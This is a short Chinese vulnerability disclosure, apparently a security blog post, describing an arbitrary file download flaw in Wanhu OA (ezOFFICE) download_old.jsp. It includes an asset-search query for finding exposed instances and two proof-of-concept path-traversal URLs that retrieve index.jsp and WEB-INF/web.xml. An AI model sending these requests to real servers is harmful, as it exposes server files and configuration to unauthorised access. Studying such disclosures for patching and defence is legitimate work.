万户OA download_old.jsp 任意文件下载漏洞

漏洞描述

万户OA download_old.jsp文件存在任意文件下载漏洞,攻击者通过漏洞可以下载服务器上的任意文件。

漏洞影响

万户OA

网络测绘

app=”万户网络-ezOFFICE”

漏洞复现

产品页面

20231204104848774-png

验证POC

/defaultroot/download_old.jsp?path=..&name=x&FileName=index.jsp
/defaultroot/download_old.jsp?path=..&name=x&FileName=WEB-INF/web.xml

20231204105837621-1646041831774-193db33c-c438-459e-918a-bdae1a1a1270.a6c3abde_2023-12-04_10-58-04 (1)

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容